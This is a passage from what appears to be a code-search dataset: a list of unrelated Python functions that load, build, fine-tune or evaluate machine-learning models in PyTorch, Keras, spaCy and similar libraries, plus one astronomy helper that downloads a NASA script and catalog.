_files.model_file(LANDMARKS_WEIGHTS)\n face_rec_model_path = _files.model_file(RESNET_WEIGHTS)\n \n detector = dlib.get_frontal_face_detector()\n sp = dlib.shape_predictor(predictor_path)\n facerec = dlib.face_recognition_model_v1(face_rec_model_path)\n \n return (detector, sp, facerec)", "def build_model():", "def evaluate(args):\n dataset_param_filepath = os.path.join(args.model, 'dataset.params')\n dataset_params = putils.load_params(dataset_param_filepath)\n left_vocab_filepath = os.path.join(args.model, 'left.vocab')\n left_vocab = Vocab(vocab_filepath=left_vocab_filepath)\n right_vocab_filepath = os.path.join(args.model, 'right.vocab')\n right_vocab = Vocab(vocab_filepath=right_vocab_filepath)\n model_params_filepath = os.path.join(args.model, 'model.params')\n model_params = putils.load_params(model_params_filepath)\n checkpoint_filepath = os.path.join(args.model, 'checkpoint.tar')\n if not torch.cuda.is_available() and model_params['cuda']:\n logger.info('Loading a GPU-trained model on CPU')\n checkpoint 
= torch.load(checkpoint_filepath,\n map_location=const.DEVICE)\n elif torch.cuda.is_available() and model_params['cuda']:\n logger.info('Loading a GPU-trained model on GPU')\n checkpoint = torch.load(checkpoint_filepath)\n elif torch.cuda.is_available() and not model_params['cuda']:\n logger.info('Loading a CPU-trained model on GPU')\n checkpoint = torch.load(checkpoint_filepath,\n map_location='cuda:0')\n else:\n logger.info('Loading a CPU-trained model on CPU')\n checkpoint = torch.load(checkpoint_filepath)\n if checkpoint['encoder']['model_type'] == 'transformer':\n encoder = TEncoder(input_size=checkpoint['encoder']['input_size'],\n hidden_size=checkpoint['encoder']['hidden_size'],\n num_layers=checkpoint['encoder']['num_layers'],\n dropout=checkpoint['encoder']['dropout'],\n num_attention_heads=checkpoint['encoder']['num_attention_heads'])\n else:\n encoder = Encoder(model_type=checkpoint['encoder']['model_type'],\n input_size=checkpoint['encoder']['input_size'],\n hidden_size=checkpoint['encoder']['hidden_size'],\n num_layers=checkpoint['encoder']['num_layers'],\n nonlinearity=checkpoint['encoder']['nonlinearity'],\n bias=checkpoint['encoder']['bias'],\n dropout=checkpoint['encoder']['dropout'],\n bidirectional=checkpoint['encoder']['bidirectional'])\n if checkpoint['decoder']['model_type'] == 'transformer':\n decoder = TDecoder(hidden_size=checkpoint['decoder']['hidden_size'],\n output_size=checkpoint['decoder']['output_size'],\n num_layers=checkpoint['decoder']['num_layers'],\n dropout=checkpoint['decoder']['dropout'],\n num_attention_heads=checkpoint['decoder']['num_attention_heads'])\n elif checkpoint['decoder']['with_attention']:\n decoder = Attention(hidden_size=checkpoint['decoder']['hidden_size'],\n output_size=checkpoint['decoder']['output_size'],\n max_seq_len=dataset_params['max_seq_len'],\n num_layers=checkpoint['decoder']['num_layers'],\n nonlinearity=checkpoint['decoder']['nonlinearity'],\n bias=checkpoint['decoder']['bias'],\n dropout=checkpoint['decoder']['dropout'])\n else:\n decoder = Decoder(model_type=checkpoint['decoder']['model_type'],\n hidden_size=checkpoint['decoder']['hidden_size'],\n output_size=checkpoint['decoder']['output_size'],\n num_layers=checkpoint['decoder']['num_layers'],\n nonlinearity=checkpoint['decoder']['nonlinearity'],\n bias=checkpoint['decoder']['bias'],\n dropout=checkpoint['decoder']['dropout'])\n encoder.load_state_dict(checkpoint['encoder_state_dict'])\n decoder.load_state_dict(checkpoint['decoder_state_dict'])\n if torch.cuda.is_available():\n encoder.to(const.DEVICE)\n decoder.to(const.DEVICE)\n encoder.eval()\n decoder.eval()\n pairs = putils.convert_to_seq_pairs(args.data)\n indexed_pairs = putils.index_pairs(pairs, left_vocab.char2idx,\n right_vocab.char2idx)\n if dataset_params['reverse']:\n indexed_pairs = [(y, x) for x, y in indexed_pairs]\n source_vocab = right_vocab\n target_vocab = left_vocab\n else:\n source_vocab = left_vocab\n target_vocab = right_vocab\n if args.random > 0:\n random.shuffle(indexed_pairs)\n for seq_num in range(args.random):\n seq = indexed_pairs[seq_num]\n print('-'*80)\n input_str = ' '.join(\n ''.join([source_vocab.idx2char[idx] for idx in seq[0] if idx\n not in [const.SOS_IDX, const.EOS_IDX]])\n .split(const.SEP))\n gold_str = ' '.join(\n ''.join([target_vocab.idx2char[idx] for idx in seq[1] if idx\n not in [const.SOS_IDX, const.EOS_IDX]])\n .split(const.SEP))\n predicted_idxx = decode(seq[0], args.itemize, encoder, decoder,\n dataset_params['max_seq_len'])\n pred_str = ' '.join(\n 
''.join([target_vocab.idx2char[idx] for idx in predicted_idxx\n if idx not in [const.SOS_IDX, const.EOS_IDX]])\n .split(const.SEP))\n print('>', input_str)\n print('=', gold_str)\n print('<', pred_str)\n else:\n _evaluate(indexed_pairs, args.itemize, encoder, decoder,\n target_vocab.idx2char, dataset_params['max_seq_len'])", "def load_model():\n prepro = Prepro(PATH_STOPSWORD, PATH_ACRONYM)\n vectorizer = joblib.load(PATH_TFIDF)\n label_encoder = joblib.load(PATH_ENCODER)\n model_svm = joblib.load(PATH_SVM)\n model_nb = joblib.load(PATH_NB)\n model_lr = joblib.load(PATH_LR)\n return prepro, vectorizer, label_encoder, model_svm, model_nb, model_lr", "def gen_model():\n\n\tmodel = skipthoughts.load_model()\n\treturn model", "def load_model(self):\n if self.ckpt_flag:\n LOG('Skip Loading Pre-trained Model......')\n else:\n if self.params.pre_trained_from is not None and os.path.exists(self.params.pre_trained_from):\n try:\n LOG('Loading Pre-trained Model at %s' % self.params.pre_trained_from)\n pretrain = torch.load(self.params.pre_trained_from)\n self.network.load_state_dict(pretrain)\n LOG('Pre-trained Model Loaded!')\n except:\n WARNING('Cannot load pre-trained model. Start training......')\n else:\n WARNING('Pre-trained model do not exits. Start training......')", "def rl_modelrl_ae_base():\n hparams = rl_modelrl_base()\n hparams.ppo_params = \"ppo_pong_ae_base\"\n hparams.generative_model_params = \"basic_conv_ae\"\n hparams.autoencoder_train_steps = 100000\n return hparams", "def _train_model(self):\n raise NotImplementedError()", "def rl_modelrl_ae_tiny():\n hparams = rl_modelrl_tiny()\n hparams.ppo_params = \"ppo_pong_ae_base\"\n hparams.generative_model_params = \"basic_conv_ae\"\n hparams.autoencoder_train_steps = 20\n return hparams", "def custom_model():\n\t# initialize the model\n\t# load weights from path\n\t# returns model\n\tmodel = mlp.get_training_model()\n\tmodel.load_state_dict(torch.load(\"model_wt.pth\"))\n\treturn model", "def model() -> Any:\n with open(\"airbnb_regressor.pickle\",\"rb\") as f:\n model = pickle.load(f)\n return model", "def load_trained_model(filename = 'pricing_model.p'):\n # with ZipFile(\"model.zip\",\"r\") as w:\n # w.extractall()\n \n with open(filename, 'rb') as model:\n pricingmodel = pickle.load(model)\n \n # pricingmodel.Model_made = tf.keras.models.load_model(\"Model_made.h5\")\n # pricingmodel.Model_claim = tf.keras.models.load_model(\"Model_claim.h5\")\n \n \n return pricingmodel", "def _load_model(self):\n self._load_scaler('scaler.save')\n self._load_encoder('encoder0.save', 0)\n self._load_encoder('encoder1.save', 1)\n self._load_neural_network('model.json', 'model.h5')\n return", "def predict():\n\n predict_cfg = get_predict_args()\n device = get_device()\n print(device)\n\n # load checkpoint\n ckpt_path = find_ckpt_in_directory(predict_cfg.ckpt)\n ckpt = torch.load(ckpt_path, map_location=device)\n best_iter = ckpt[\"best_iter\"]\n cfg = ckpt[\"cfg\"]\n aspect = cfg[\"aspect\"]\n\n for k, v in cfg.items():\n print(\"{:20} : {:10}\".format(k, str(v)))\n\n eval_batch_size = 64\n\n print(\"Loading data\")\n dev_data = list(beer_reader(cfg[\"dev_path\"]))\n test_data = beer_annotations_reader(cfg[\"test_path\"], aspect=aspect)\n\n print(\"dev\", len(dev_data))\n print(\"test\", len(test_data))\n\n print(\"Loading pre-trained word embeddings\")\n vocab = Vocabulary()\n vectors = load_embeddings(cfg[\"embeddings\"], vocab) # required for vocab\n\n # build model\n model = build_model(cfg[\"model\"], vocab, cfg=cfg)\n\n # load parameters from 
checkpoint into model\n print(\"Loading saved model..\")\n model.load_state_dict(ckpt[\"state_dict\"])\n model.to(device)\n print(\"Done\")\n\n print(model)\n print_parameters(model)\n\n print(\"Evaluating\")\n dev_eval = evaluate_loss(\n model, dev_data, batch_size=eval_batch_size,\n device=device, cfg=cfg)\n test_eval = evaluate_loss(\n model, test_data, batch_size=eval_batch_size,\n device=device, cfg=cfg)\n\n if hasattr(model, \"z\"):\n path = os.path.join(\n cfg[\"save_path\"], \"final_rationales.txt\")\n test_precision, test_macro_prec = evaluate_rationale(\n model, test_data, aspect=aspect, device=device,\n batch_size=eval_batch_size, path=path)\n else:\n test_precision = 0.\n test_macro_prec = 0.\n test_eval[\"precision\"] = test_precision\n test_eval[\"macro_precision\"] = test_macro_prec\n\n dev_s = make_kv_string(dev_eval)\n test_s = make_kv_string(test_eval)\n\n print(\"best model iter {:d} dev {} test {}\".format(\n best_iter, dev_s, test_s))", "def pretrained(name=\"pos_anc\", lang=\"en\", remote_loc=None):\n from sparknlp.pretrained import ResourceDownloader\n return ResourceDownloader.downloadModel(PerceptronModel, name, lang, remote_loc)", "def load_model():\r\n global model # 下面的那个predict也是要用的 所以在这里定义为全局\r\n model = DenseNet(n_input_channels=1, num_init_features=64,\r\n growth_rate=32,\r\n block_config=(3, 6, 12, 8), num_classes=4).to(device)\r\n model.load_state_dict(torch.load(\"./model29.pkl\"))\r\n model.eval()", "def load_model(self) -> Any:", "def make_model(self):\n if self.model_type=='densenet_121':\n model = self.make_densenet_121(self.weights)\n\n\n return model", "def makeModel(self):\n\n # Get the script\n modelScript = os.path.join(self.datapath, 'make3FGLxml.py')\n if not os.path.isfile(modelScript):\n # download it\n print(\"\\t=== Downloading make3FGLxml.py ===\")\n os.system('wget https://fermi.gsfc.nasa.gov/ssc/data/analysis/user/make3FGLxml.py -O {}'.format(modelScript))\n\n # Create the model using Tyrel's script\n galModel = os.path.join(self.diffpath, 'gll_iem_v06.fits')\n isoModel = os.path.join(self.diffpath, 'iso_'+self.irf+'_v06.txt')\n if (not os.path.isfile(galModel)) or (not os.path.isfile(isoModel)):\n print(\"\\t=== Unable to find the diffuse models, check the variable '$FERMI_DIR' ===\")\n return\n if not os.path.isdir(self.extpath):\n print(\"\\t=== Unable to find models of extended sources, check the variable '$LATEXTDIR' ===\")\n return\n if not os.path.isfile(self.fermicat):\n # download it\n print(\"\\t=== Downloading 3FGL catalog ===\")\n os.system('wget https://fermi.gsfc.nasa.gov/ssc/data/access/lat/4yr_catalog/gll_psc_v16.fit -O {}'.format(self.fermicat))\n\n os.popen(\"python {} {} {} -o {} -G {} -g 'gll_iem_v06'\\\n -I {} -i 'iso_source_v06' -e {} -r 5 -R 10 -ER 10\\\n -s 9 -m False -GIF False\".format(modelScript, self.fermicat,\n self.ft1, self.model, galModel, isoModel, self.extpath))\n\n # Add the target to the model\n tmpName = self.model + '.tmp'\n rfil = open(self.model, 'r')\n wfil = open(tmpName, 'w')\n # Copy the XML to the temporary model\n wfil.writelines([l for l in rfil.readlines() if not l=='</source_library>']) # copy everything but the last line\n wfil.write(' <source ROI_Center_Distance=\"0.00\" name=\"TARGET\" type=\"PointSource\">\\n')\n wfil.write(' <spectrum type=\"PowerLaw2\">\\n')\n wfil.write(' <parameter free=\"1\" max=\"1000\" min=\"1e-05\" name=\"Integral\" scale=\"1e-08\" value=\"0.3591824258\"/>\\n')\n wfil.write(' <parameter free=\"1\" max=\"1\" min=\"-5\" name=\"Index\" scale=\"1\" 
value=\"-2.7\"/>\\n')\n wfil.write(' <parameter free=\"0\" max=\"1000000\" min=\"20\" name=\"LowerLimit\" scale=\"1\" value=\"100\"/>\\n')\n wfil.write('<parameter free=\"0\" max=\"1000000\" min=\"20\" name=\"UpperLimit\" scale=\"1\" value=\"100000\"/>\\n')\n wfil.write(' </spectrum>\\n')\n wfil.write(' <spatialModel type=\"SkyDirFunction\">\\n')\n wfil.write(' <parameter free=\"0\" max=\"360.0\" min=\"-360.0\" name=\"RA\" scale=\"1.0\" value=\"'+str(self.ra)+'\"/>\\n')\n wfil.write(' <parameter free=\"0\" max=\"360.0\" min=\"-360.0\" name=\"DEC\" scale=\"1.0\" value=\"'+str(self.dec)+'\"/>\\n')\n wfil.write(' </spatialModel>\\n')\n wfil.write(' </source>\\n')\n wfil.write('</source_library>\\n')\n rfil.close()\n wfil.close()\n\n os.remove(self.model)\n os.rename(tmpName, self.model)\n \n print(\"\\t=== Source model {} added ===\".format(self.model))\n return", "def mtf_transformer_lm_moe():\n hparams = mtf_transformer.mtf_transformer_lm_baseline()\n hparams.decoder_layers = [\"att\", \"moe\"] * 4\n moe.set_default_moe_hparams(hparams)\n hparams.mesh_shape = \"all:8\"\n hparams.layout = \"batch:all;experts:all\"\n return hparams", "def load_model(file_index):\n normal, abnormal, all = read_in(file_index, 1, 2, 0.3)\n autoencoder = keras.models.load_model('Working_Data/ae_patient_' + str(file_index) + '_dim' + str(100) + '_model.h5')\n reconstructed = autoencoder.predict(all)\n reconstruction_save = \"Working_Data/reconstructed_cdae_10d_Idx\" + str(file_index) + \".npy\"\n np.save(reconstruction_save, reconstructed)", "def __init__(self):\n # self.model = get_pretrained_model()\n self.tokenizer = get_tokenizer()\n self.model = transformers.Trainer(model=get_pretrained_model())\n self.summarizer = pipeline(\"summarization\") # ~1.2 GB download the first time this is run.", "def resnet46(pretrained=False):\n model = ResNet(BasicBlock, [3, 6, 10, 3])\n if pretrained:\n pass\n #model.load_state_dict(model_zoo.load_url(model_urls['resnet18']))\n return model", "def load_model(self):\n if os.stat('code/lr-model.pt').st_size == 0:\n return\n params = torch.load('code/lr-model.pt')\n self.set_params(params)", "def load_trained_model(unit):\n return load_model(DATA_FOLDER + \"{}_cdae_model.hd5\".format(UNITS[unit]))", "def __init__(self, n_feature, n_hidden, n_output):\n super(simpleAE, self).__init__()\n self.Encoder = Encoder(n_feature, n_hidden)\n self.Decoder = Decoder(n_hidden, n_output)\n self.model_name = 'simpleAE'", "def load_model():\n return \"None\"", "def main(args):\n bad_words_file = codecs.open(args.language + \"/feature_files/bad_words\", \"r\", \"utf-8\").readlines()\n bad_words = read_known_words(bad_words_file)\n \n good_words_file = codecs.open(args.language + \"/feature_files/good_words\", \"r\", \"utf-8\").readlines()\n good_words = read_known_words(good_words_file)\n\n curse_words_file = codecs.open(args.language + \"/feature_files/curse_words\", \"r\", \"utf-8\").readlines()\n curse_words = read_known_words(curse_words_file)\n\n prepositions_file = codecs.open(args.language + \"/feature_files/prepositions\", \"r\", \"utf-8\").readlines()\n prepositions = read_known_words(prepositions_file)\n\n determiners_file = codecs.open(args.language + \"/feature_files/determiners\", \"r\", \"utf-8\").readlines()\n determiners = read_known_words(determiners_file)\n\n syllables_file = codecs.open(args.language + \"/feature_files/syllables\", \"r\", \"utf-8\").readlines()\n syllable_structure = read_syllables_file(syllables_file)\n\n other_feature_files = glob.glob(args.language + 
\"/feature_files/*.txt\")\n other_features = set_features_from_files(other_feature_files)\n \n ermaObj = ConllToErma(args, bad_words, good_words, curse_words, prepositions, \\\n determiners, syllable_structure, other_features)\n\n if not args.just_test:\n # Input training file.\n train_id = open(args.train, \"r\")\n train = train_id.readlines()\n train_id.close()\n sys.stdout.write(\"Reading training file...\\n\")\n (train_features, train_skip_chains) = ermaObj.read_conll_file(train)\n sys.stdout.write(\"Building model...\\n\")\n train_hash = ermaObj.make_nodes(train_features)\n # Freeze the known features based on what's seen in the training data\n ermaObj.cutoff_features()\n else:\n train_hash = {}\n train_skip_chains = {}\n # Input testing file.\n test_id = open(args.test, \"r\")\n test = test_id.readlines()\n test_id.close()\n sys.stdout.write(\"Reading test file...\\n\")\n (test_features, test_skip_chains) = ermaObj.read_conll_file(test)\n sys.stdout.write(\"Building model...\\n\")\n test_hash = ermaObj.make_nodes(test_features, test=True)\n ermaObj.write_out(train_hash, train_skip_chains, test_hash, test_skip_chains)", "def load_model(self):\n self.pred_net.load((self.save_path / \"iqn_pred_net\").absolute().as_posix())\n self.target_net.load((self.save_path / \"iqn_target_net\").absolute().as_posix())", "def load_model(model_path):\n nlp = spacy.blank('en') \n if 'ner' not in nlp.pipe_names:\n ner = nlp.create_pipe('ner')\n nlp.add_pipe(ner)\n #load pretrained model from the path\n ner = nlp.from_disk(model_path)\n return ner", "def load_model():\r\n model = MobileNetV2(weights=\"imagenet\")\r\n print(\"Model loaded\")\r\n return model", "def create_model(self):\n model = solph.Model(self.es)\n return model", "def main():\n data = load_data()\n analyze_features(data['full_features'])\n model = train(data)\n\n with open('model.pickle', 'wb') as f:\n pickle.dump(model, f)\n evaluate(model, data)", "def initiate(self):\n # if self.opt.checkpoint_encoder:\n # self.load(self.opt.checkpoint_encoder, self.opt.checkpoint_decoder)\n # else:\n # start fresh.\n self.model = Transformer(\n self.opt.src_vocab_size,\n self.opt.tgt_vocab_size,\n self.opt.max_token_seq_len,\n tgt_emb_prj_weight_sharing=self.opt.proj_share_weight,\n emb_src_tgt_weight_sharing=self.opt.embs_share_weight,\n d_k=self.opt.d_k,\n d_v=self.opt.d_v,\n d_model=self.opt.d_model,\n d_word_vec=self.opt.d_word_vec,\n d_inner=self.opt.d_inner_hid,\n n_layers=self.opt.layers,\n n_head=self.opt.n_head,\n dropout=self.opt.dropout).to(self.device)\n \n for p in self.model.parameters():\n if p.dim() > 1:\n nn.init.xavier_uniform_(p)", "def build_model():\n model = Sequential()\n model.add(Dense(beer_emb.EMB_DIM, activation=\"relu\",\n input_dim=beer_emb.EMB_DIM))\n model.add(Dropout(0.5))\n model.add(Dense(64, activation=\"relu\"))\n model.add(Dropout(0.5))\n model.add(Dense(32, activation=\"relu\"))\n model.add(Dense(1, activation='sigmoid'))\n model.compile(loss='binary_crossentropy',\n metrics=['accuracy'], optimizer='adam')\n\n return model", "def __call__(self):\n custom_obj = {'tf': tf, 'relu6': tf.nn.relu6}\n wfile = self._get_model_weights()\n model = tf.keras.models.load_model(wfile, custom_objects=custom_obj)\n\n if not self._trainable:\n # freeze encoder layers up to\n # expanded_conv_16_project_BN\n for layer in model.layers[1:147]:\n layer.trainable = False\n\n return model", "def densenet201(pretrained=False, **kwargs):\n model = ResNetFeatures(BasicBlock, [3, 4, 6, 3], **kwargs)\n if pretrained:\n 
_load_pretrained(model, model_zoo.load_url(model_urls['densenet201']))\n return model", "def build_model(config):\n # Load the pretrained model\n detr = get_detr_model(config, include_top=True, weights=\"detr\")\n detr.summary()\n return detr", "def esm1_t34_670M_UR100():\n return load_model_and_alphabet_hub(\"esm1_t34_670M_UR100\")", "def get_model(n_obs=100, ess=50, ug=None, seed_obs=None):\n if ug is None:\n ug = np.zeros((4, 4))\n ug[0, 1:3] = 1\n ug[1:3, 0] = 1\n\n m = elfi.new_model()\n priors = []\n dag, node_ordering, oc = ug_to_dag(ug)\n para_mat = mn_para_mat(ug)\n combs_to_node = 2 ** np.sum(dag, axis=0)\n n_dim = np.sum(combs_to_node).astype(int)\n alpha = ess / 2 / oc.shape[0] * np.ones(n_dim)\n no_connections = np.where(np.sum(dag, axis=0) == 0)[0].astype(int)\n alpha[no_connections] = ess / 2\n\n for i in np.arange(n_dim):\n name_prior = 'a_{}'.format(i)\n prior_beta = elfi.Prior('beta',\n alpha[i],\n alpha[i],\n model=m,\n name=name_prior)\n priors.append(prior_beta)\n\n sim_fn = partial(gmn_simulate,\n ug=ug,\n n=n_obs,\n ess=ess,\n dag=dag,\n node_ordering=node_ordering,\n oc=oc,\n para_mat=para_mat)\n a_true = 0.2 * np.ones((n_dim, 1))\n y = sim_fn(a_true)\n\n elfi.Simulator(sim_fn, *priors, observed=y, name='GMN')\n elfi.Summary(sumstats, m['GMN'], oc.shape[0], n_obs, name='S')\n elfi.Distance('euclidean', m['S'], name='d')\n\n return m", "def build(model_name):\n return pretrain.factory.create(model_name)", "def load_openai_pretrained_model(model, cfg, n_special, dir):\n n_ctx = cfg.n_ctx\n n_embd = cfg.n_embd\n n_transfer = cfg.n_layer\n # Load weights from TF model\n print(\"Loading weights...\")\n names = json.load(open(dir + 'parameters_names.json'))\n shapes = json.load(open(dir + 'params_shapes.json'))\n offsets = np.cumsum([np.prod(shape) for shape in shapes])\n init_params = [np.load(dir + 'params_{}.npy'.format(n)) for n in range(10)]\n init_params = np.split(np.concatenate(init_params, 0), offsets)[:-1]\n init_params = [param.reshape(shape) for param, shape in zip(init_params, shapes)]\n if n_ctx > 0:\n init_params[0] = init_params[0][:n_ctx]\n if n_special > 0:\n init_params[0] = np.concatenate(\n [init_params[1],\n (np.random.randn(n_special, n_embd) * 0.02).astype(np.float32),\n init_params[0]\n ], 0)\n else:\n init_params[0] = np.concatenate(\n [init_params[1],\n init_params[0]\n ], 0)\n del init_params[1]\n if n_transfer == -1:\n n_transfer = 0\n else:\n n_transfer = 1 + n_transfer * 12\n init_params = [arr.squeeze() for arr in init_params]\n\n try:\n assert model.embed.weight.shape == init_params[0].shape\n except AssertionError as e:\n e.args += (model.embed.weight.shape, init_params[0].shape)\n raise\n\n model.embed.weight.data = torch.from_numpy(init_params[0])\n\n for name, ip in zip(names[1:n_transfer], init_params[1:n_transfer]):\n name = name[6:] # skip \"model/\"\n assert name[-2:] == \":0\"\n name = name[:-2]\n name = name.split('/')\n pointer = model\n for m_name in name:\n if re.fullmatch(r'[A-Za-z]+\\d+', m_name):\n l = re.split(r'(\\d+)', m_name)\n else:\n l = [m_name]\n pointer = getattr(pointer, l[0])\n if len(l) >= 2:\n num = int(l[1])\n pointer = pointer[num]\n try:\n assert pointer.shape == ip.shape\n except AssertionError as e:\n e.args += (pointer.shape, ip.shape)\n raise\n pointer.data = torch.from_numpy(ip)", "def bisenet_face_parsing():\r\n network = BiSeNet_keras()\r\n network.load_weights(MODEL_PATH)\r\n return network", "def convert_to_model(self, *args):", "def load_model():\n global obj\n obj = NutritionTableDetector()\n 
print(\"Weights Loaded!\")", "def model_fn(model_dir):\n\n model = BertForSequenceClassification.from_pretrained('cl-tohoku/bert-base-japanese-whole-word-masking', \n num_labels=1)\n model = torch.nn.DataParallel(model)\n with open(os.path.join(model_dir, 'model.pth'), 'rb') as f:\n model.load_state_dict(torch.load(f))\n \n return {\"net\": model, \"tokenizer\": tokenizer}", "def pretrained(name=\"elmo\", lang=\"en\", remote_loc=None):\n from sparknlp.pretrained import ResourceDownloader\n return ResourceDownloader.downloadModel(ElmoEmbeddings, name, lang, remote_loc)", "def loadModel(self):\n self.model.load_state_dict(torch.load(os.path.join(self.model_save_dir, '{}_trained.pt'.format(self.model_name)), map_location=torch.device(device)))\n return self.model", "def load_model(self, filename):\r\n pass", "def load_fasttext_en_pretrained():\r\n log.info(\"Load FT Model\")\r\n path = Path.join(package_path, 'augmentation', 'data', 'fasttext_en', 'cc.en.300.bin')\r\n\r\n if not Path.isfile(path):\r\n raise ValueError(\"Fast Text Pretrained Model is not available, please run: `from seaqube import download;download('fasttext-en-pretrained')`\")\r\n\r\n with open(path, 'rb') as fin:\r\n return PreTrainedFTRawEN(load(fin))", "def test_model_loading(self):\n\n inputs = tf.placeholder(dtype=tf.int32, shape=[None, None])\n\n for pretrained_model_name in XLNetEncoder.available_checkpoints():\n encoder = XLNetEncoder(pretrained_model_name=pretrained_model_name)\n _ = encoder(inputs)", "def get_pretrained_model(model_name, n_classes):\n\n if model_name == 'vgg16':\n model = models.vgg16(pretrained=True)\n\n # Freeze early layers\n for param in model.parameters():\n param.requires_grad = False\n n_inputs = model.classifier[6].in_features\n\n # Add on classifier\n model.classifier[6] = nn.Sequential(\n nn.Linear(n_inputs, 256), nn.ReLU(), nn.Dropout(0.2),\n nn.Linear(256, n_classes), nn.LogSoftmax(dim=1))\n\n elif model_name == 'resnet50':\n model = models.resnet50(pretrained=True)\n\n for param in model.parameters():\n param.requires_grad = False\n\n n_inputs = model.fc.in_features\n model.fc = nn.Sequential(\n nn.Linear(n_inputs, 256), nn.ReLU(), nn.Dropout(0.2),\n nn.Linear(256, n_classes), nn.LogSoftmax(dim=1))\n\n # Move to gpu and parallelize\n if train_on_gpu:\n model = model.to('cuda')\n\n if multi_gpu:\n model = nn.DataParallel(model)\n\n return model", "def test_load_model():\n spectrum_binner, test_generator = get_test_binner_and_generator()\n\n model_file = TEST_RESOURCES_PATH / \"testmodel.hdf5\"\n model = load_model(model_file)\n assert model.spectrum_binner.__dict__ == spectrum_binner.__dict__, \"Expected different spectrum binner\"\n\n # Test model layer shapes\n assert model.model.layers[2].to_json() == model.base.to_json(), \\\n \"Expected based model to be identical to part of main model.\"\n\n # Test base model inference\n X, y = test_generator.__getitem__(0)\n embeddings = model.base.predict(X[0])\n assert isinstance(embeddings, np.ndarray), \"Expected numpy array\"\n assert embeddings.shape[0] == test_generator.settings[\"batch_size\"] == 32, \\\n \"Expected different batch size\"\n assert embeddings.shape[1] == model.base.output_shape[1] == 200, \\\n \"Expected different embedding size\"", "def resnet():\n return models.resnet152(pretrained=True)", "def test_fer_model(img_folder, model=\"/path/to/model\"):\n preds = None\n ### Start your code here\n\n if not os.path.exists(model):\n print (\"Model Loading Error: can't find the model.\\n\")\n return None\n\n if not 
os.path.exists(img_folder):\n print (\"Data Loading Error: can't find the data.\\n\")\n return None\n\n with open(model, 'rb') as model_file:\n model = load(model_file)\n data = load_FER2013_samples(img_folder)\n preds = model.predict(data)\n print (preds)\n ### End of code\n return preds", "def transformerXLModel(*args, **kwargs):\n model = TransfoXLModel.from_pretrained(*args, **kwargs)\n return model", "def model_fn(model_dir):\n model = models.resnet50(pretrained=True)\n\n _ = model.eval()\n\n modules=list(model.children())[:-1]\n model=nn.Sequential(*modules)\n for p in model.parameters():\n p.requires_grad = False\n\n device = torch.device('cuda:0' if torch.cuda.is_available() else \"cpu\")\n\n model = model.to(device)\n\n return model", "def load_model(self):\n pass", "def get_model():\n # Load the pretrained model.\n model = torchvision.models.resnet34(pretrained=True)\n\n # Resize model for our task.\n model.conv1 = torch.nn.Conv2d(1, 64, kernel_size=3, stride=1, padding=1,\n bias=False)\n model.avgpool = torch.nn.AvgPool2d(2)\n model.fc = torch.nn.Linear(in_features=512, out_features=10, bias=True)\n\n return model", "def evaluate_model():\n\n # Get the processed data (in proper format to evaluate the NER model)\n data = get_json_from_file_path(PROCESSED_DATA_PATH)\n # Split the dataset for training and test as we did for training\n train_data, test_data = train_test_split(data, train_size=0.7, \n random_state=4)\n\n # Load the model trained\n try:\n ner_model = spacy.load(OUTPUT_MODEL_PATH)\n except Exception as err:\n msg = f'Could not load the model. Error: {err}'\n raise Exception(msg)\n\n # Compute evaluation scores\n print('Computing metrics...')\n scores = evaluate(ner_model, test_data)\n # General metrics of the model\n f_score = scores.get('ents_f')\n precision = scores.get('ents_p')\n recall = scores.get('ents_r')\n print('\\nScoring:')\n print(f'F-score: {f_score}')\n print(f'Precision: {precision}')\n print(f'Recall: {recall}')\n\n # Get the specific scores for each entity \n scores_per_entity = scores.get('ents_per_type')\n # Get the F-score of the entities\n f_scores_of_entities = []\n for entity_scores in scores_per_entity.values():\n f_scores_of_entities.append(entity_scores['f'])\n # Compute the macro averaged F-score\n macro_avg_f_score = sum(f_scores_of_entities)/len(f_scores_of_entities)\n print(f'Macro averaged F-score: {macro_avg_f_score}')\n \n print('\\nScores per entity;')\n print('{:<15} {:<10} {:<10} {:<10}'.format('Entity','F-score','Precision','Recall'))\n for key, value in scores_per_entity.items():\n entity = key\n f, p, r = value['f'], value['p'], value['r']\n print('{:<15} {:<10.2f} {:<10.2f} {:<10.2f}'.format(entity, f, p, r))", "def get_model():\n model = ecole.scip.Model.from_file(str(DATA_DIR / \"bppc8-02.mps\"))\n model.disable_cuts()\n model.disable_presolve()\n model.set_param(\"randomization/permuteconss\", True)\n model.set_param(\"randomization/permutevars\", True)\n model.set_param(\"randomization/permutationseed\", 784)\n model.set_param(\"randomization/randomseedshift\", 784)\n model.set_param(\"randomization/lpseed\", 784)\n return model", "def _trainedmodel(continuous, modelform, Vr, m=20):\n if continuous == \"inferred\":\n ModelClass = roi._core.InferredContinuousROM\n elif continuous:\n ModelClass = roi._core._ContinuousROM\n else:\n ModelClass = roi._core._DiscreteROM\n\n n,r = Vr.shape\n c, A, H, Hc, G, Gc, B = _get_operators(r, m)\n operators = {}\n if \"c\" in modelform:\n operators['c_'] = c\n if \"A\" in modelform:\n 
operators['A_'] = A\n if \"H\" in modelform:\n operators['Hc_'] = Hc\n if \"G\" in modelform:\n operators['Gc_'] = Gc\n if \"B\" in modelform:\n operators['B_'] = B\n\n model = roi._core.trained_model_from_operators(ModelClass, modelform,\n Vr, **operators)\n model.datacond_ = np.random.random()\n model.dataregcond_ = model.datacond_ / 2\n model.residual_ = np.random.random()\n model.misfit_ = model.residual_ / 2\n\n return model", "def build_model(cfg, char_voca, word_voca=None, gazet=None, pos_voca=None):\n\n # Build Embedder\n embedder = Embedder(\n window=cfg.window,\n char_voca=char_voca,\n word_voca=word_voca,\n jaso_dim=cfg.jaso_dim,\n char_dim=cfg.char_dim,\n word_dim=cfg.word_dim,\n gazet=gazet,\n gazet_embed=True,\n pos_enc=True,\n phoneme=True,\n pos_voca_size=len(pos_voca),\n pos_dim=cfg.pos_dim)\n\n print('Total Embedding_size: ', embedder.embed_dim)\n\n\n encoder_name, decoder_name = cfg.model_name.lower().split('-')\n\n # Build Encoder\n if encoder_name == 'fnn5':\n encoder = models.Fnn5(context_len=cfg.context_len,\n in_dim=embedder.embed_dim,\n hidden_dim=cfg.hidden_dim)\n elif encoder_name == 'cnn7':\n encoder = models.Cnn7(in_dim=embedder.embed_dim,\n hidden_dim=cfg.hidden_dim)\n elif encoder_name == 'cnn8':\n encoder = models.Cnn8(context_len=cfg.context_len,\n in_dim=embedder.embed_dim,\n hidden_dim=cfg.hidden_dim)\n elif encoder_name in ['gru', 'lstm', 'sru']:\n encoder = models.RnnEncoder(context_len=cfg.context_len,\n in_dim=embedder.embed_dim,\n out_dim=cfg.hidden_dim,\n cell=encoder_name)\n 